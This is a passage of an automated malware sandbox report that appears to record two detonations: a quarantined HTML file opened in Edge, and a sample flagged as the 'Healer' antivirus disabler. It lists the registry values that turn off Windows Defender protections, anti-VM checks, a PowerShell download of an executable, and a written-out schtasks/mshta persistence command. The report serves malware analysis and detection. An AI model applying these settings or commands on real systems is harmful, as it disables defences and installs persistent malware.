| SHA512 | ae24ed0aa860d209753a5bf741acc39296bf970b65f2f9139260f71cd22fcfc957372bbcbeb363d868b655d577f5a282ff4e12a23b6e454c7ef0e516e58834ca |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 803e5ef796a0e5356db5d4fd2229686d |
| SHA1 | 8865b103e6725890da45e38913191ae55e1465cc |
| SHA256 | 1e91a440e377ebc95d58748468e2183b2ad4cb67dd957067d74ce4d53041fe4f |
| SHA512 | db79c8d83872bfb9680f17e47bc0fcb5b385f5ec8eeb4f194aefb1f18f0b6bf5254f7f9eed4b3962da5226306267a9a47681410183680a357c5678d2f65c210e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 6b83ef21e9cdf1b2fa2debd409100e96 |
| SHA1 | f6f0c6cb15ac9a8a032b12462763a879cba0f448 |
| SHA256 | a4846adbaf76abe06ea563412e98c9c2e84248b37850b68157813384bec472ed |
| SHA512 | d228976eb7233167b2356b8db50035132c42f1a689e8e3bc18500b487c540fa0c6e83e694883cac9494d575c0a835e287a03d28d33a35a651d10d6d19afc6abc |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | b9cc1d82dfc0d90f997cbc2411f2e80a |
| SHA1 | 75d560b04426dcfb788b08b44dbdcba5b403a9d4 |
| SHA256 | 4c000e43bd74473ddc1d7d79af662a936e52cd2861ed5ae2eb170a599b1ab4d5 |
| SHA512 | c199a4cd17c0581aa64f660f8aa9ee95bc715fb78c1adc4a2bead2f7424ce2a6bac50b6b1528be3427642ef8c689b315a0ba2facf1ec2abae36e85acfe1b47c7 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 895ca9c074c4cd71224ba507d6fe7e58 |
| SHA1 | d8dd0ec0c507a22f99efd2c448429ddb75a2b668 |
| SHA256 | 48d40805e2b048caa969d409b5174e238284c05cae516dac65fa67c188aae7b7 |
| SHA512 | 60460f16a90642a227df0bea7677c38222a2b79e4b82a840cbab51f57088c0b33176a4720ad19c0ae17dc4c4584cca8da4d3a33517128b74487f220b9267d92f |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 733080989e517b14201548eb57d3c2d9 |
| SHA1 | 1b3b0a20e1d5d878597977d508d00fe17c025fda |
| SHA256 | 64b06edbd33ae5834af1c47898bb6adc487afe99334add8c8a6e5bc21a32fce2 |
| SHA512 | 9dc90c1b1621174773560ca6f7f070f18f0a4861d97a5843bb4e7d0d99fcc1e888324b5e3c474d508a965ab548d595cfe0e898ebd5788841efad8ba33d86ffe0 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 2bedde8852147592f4b46d9ef17d7e13 |
| SHA1 | 42a1f44dca66206a6c4d87cef87efda760a1e10f |
| SHA256 | ff325fe4a1264b1693de131ea6b4317f1687cb754e97de82aa7e5398cabf722e |
| SHA512 | 1cd1b165bd96cfcf6b156f56a9a24769139a11ab06cbc271f84d309b32dcfc1813ba6bd27552a28ac4f31f21b75ce5228f308875b1ddc77517538b7c8e1a8a45 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 90541e256db539eca1dc64a8d20b3b39 |
| SHA1 | 5de62e2707c96f7113f3e7f17fe3d8520584cb4d |
| SHA256 | 97d9795623347da9fdd013494631a1f3659a88a0db201bc397ff1d327f6ba4d4 |
| SHA512 | edeea905f31468f7bea2b381b53e5c53bc7264e9df31578050bba56d78de9c7a94c8f32352ad7208073d3634f64a8760a6ffdaef4c69c1a1b3f42deb770ef03d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | b483d9e0c0b3b4887c610aa7e8f72abb |
| SHA1 | ec88a9a71b08f4c70524f34d303e0e7e168524fb |
| SHA256 | bb94b68ed18839eec005a9cc55cdd44bed4e93f43b3c43b776e922e122246015 |
| SHA512 | 131bb147f281bdd19dddf57073bafbe3e81826b45315fef7ace096e33083e94f72ac5be296280f89d28ce3f49e9c4ad10c920576df709f056be2b271347697b2 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 4235abcf225c2828736e4853a0cbbd92 |
| SHA1 | 1564658e2b00901a79ef60ba4c53770cadf22168 |
| SHA256 | 83be666d5a3a1243a791d33b6f15e448a7fd578b57f1485c9bd1f32572ef74db |
| SHA512 | 7d331644f8f2c90c210d2012138134f59c87b822b76d00c929560db14aadc9d19580cdf28ec4cf6f01799b9c77b23aa40fb8768b2165f77fdcff736bfbf71088 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 342bd105be285dbc76a3b9bc82eb1ff1 |
| SHA1 | 21ec13f8510d5567c0428101d228fece5ac60e6d |
| SHA256 | 94337536a92c726b9692927afa36071b918e2022b9b1dbd2c785287945210c2b |
| SHA512 | e3c11643941efdba0232043841f45d76e3d73cd2806837912f0c55e17048de3312eee23ad56d80e638d74a53c03b29df1f9528396efcd0b2589996f4deea5128 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 45dfa035d9cb4879f49969f2427c0097 |
| SHA1 | c7e3fbb2d23abb14bc3bb669c5819910c0b985a9 |
| SHA256 | d646e0de41785fd7c63ca0c52d622d7e0b4888cdf670a11aae37110fbca95b27 |
| SHA512 | d8d379a5c5bfec28dad19c0a59b2afc8cbf6cccd032aecbf8cbc4d5dd3ad1f67f1c447f9b5879ff9e0d596ac549bdcc091080b4dcd59fd4cc28f449019d3aea6 |
Analysis: behavioral19
Detonation Overview
Submitted
2025-02-26 23:27
Reported
2025-02-26 23:30
Platform
win10v2004-20250217-en
Max time kernel
145s
Max time network
128s
Command Line
Signatures
Browser Information Discovery
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\kablenet.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe4e9546f8,0x7ffe4e954708,0x7ffe4e954718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,15876232047822424636,13281325721610766394,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2160,15876232047822424636,13281325721610766394,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2160,15876232047822424636,13281325721610766394,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2836 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,15876232047822424636,13281325721610766394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3196 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,15876232047822424636,13281325721610766394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2160,15876232047822424636,13281325721610766394,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5092 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2160,15876232047822424636,13281325721610766394,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5092 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,15876232047822424636,13281325721610766394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5180 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,15876232047822424636,13281325721610766394,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5196 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,15876232047822424636,13281325721610766394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,15876232047822424636,13281325721610766394,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,15876232047822424636,13281325721610766394,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4792 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 93be3a1bf9c257eaf83babf49b0b5e01 |
| SHA1 | d55c01e95c2e6a87a5ece8cc1d466cc98a520e2a |
| SHA256 | 8786fd66f4602e6ed3fa5248bd597b3f362ffa458f85207eaa154beb55522348 |
| SHA512 | 885b09dd3072921f375eedb5f0575561adc89700ecfbe999bc3e5ea1d7cb45e19d85c5e420f2c0a12b428742e1110e66f4ceecbe5a6badddd36cc9e0aff48e52 |
\??\pipe\LOCAL\crashpad_4380_FCFZQUCWKNGHFXBO
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 6738f4e2490ee5070d850bf03bf3efa5 |
| SHA1 | fbc49d2dd145369e8861532e6ebf0bd56a0fe67c |
| SHA256 | ca80bbae3c392e46d730a53d0ee4cfecbbe45c264ad3b3c7ee287252c21eaeab |
| SHA512 | 2939edf5e6c34c9ea669a129a4a5a410fbbd29cd504dc8e007e9b3b3c7fbb9bea8c14d6177ac375d0c481995774a02d210328569231cb01db07b59452333b22b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 4e2d71d6ff210326092dc385fb5b747f |
| SHA1 | 68bcca89c257a30cd7096c3be83b9b02fccd82b1 |
| SHA256 | 2b9b0462052913ba0a94fe89845d4d192b815964a9a9e0e048b97e6e90636411 |
| SHA512 | c4c5c35db03890e457159d42e810a55a800d86092fe141e98173301056632079f7f4410557dbde8974279e49ee858bdf2ab583287f938a6d70d89c60f4d9ef6f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 9267891b746e1293c1db6d863760ab97 |
| SHA1 | 2a3127e67b9fa12aae0208f9c2a7f2621a703e6c |
| SHA256 | 904af23b3b22aa3ccdb8adcec50275b39a247dcd43392acd28b5f4590259dc39 |
| SHA512 | b962f39f7b86b3d83dbfc9f7c287c746b61a09ac1c9c32a2746d7829cf7687c80ef65111a89762bf961af573dbde16c3b614351d1e3004e6e89c8fc24c0eb92a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 0eb92d7fc4cc6e26f79d25b61631feb4 |
| SHA1 | 957dea426f86179728503af52ebb35d82249b4a5 |
| SHA256 | 733e7b9e759012d667a7bde829661c20cf37a73ddaecc404ce910e3eeea45731 |
| SHA512 | 36e9fdbe415afa1ed3af270d007c3a28bfbbc1379a29f50e26339f72e6eafd547a933d209543c32b75fe3d3340452dfafe82ba497c21c818c34b8d4e9ee70bc8 |
Analysis: behavioral25
Detonation Overview
Submitted
2025-02-26 23:27
Reported
2025-02-26 23:30
Platform
win7-20240903-en
Max time kernel
117s
Max time network
118s
Command Line
Signatures
Detects Healer an antivirus disabler dropper
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Healer
Healer family
Modifies Windows Defender DisableAntiSpyware settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE | N/A |
Modifies Windows Defender TamperProtection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE | N/A |
Modifies Windows Defender notification settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications | C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" | C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE | N/A |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE | N/A |
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn mxT1RmaX9Cr /tr "mshta C:\Users\Admin\AppData\Local\Temp\9T4YEFyEF.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\9T4YEFyEF.hta
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn mxT1RmaX9Cr /tr "mshta C:\Users\Admin\AppData\Local\Temp\9T4YEFyEF.hta" /sc minute /mo 25 /ru "Admin" /f
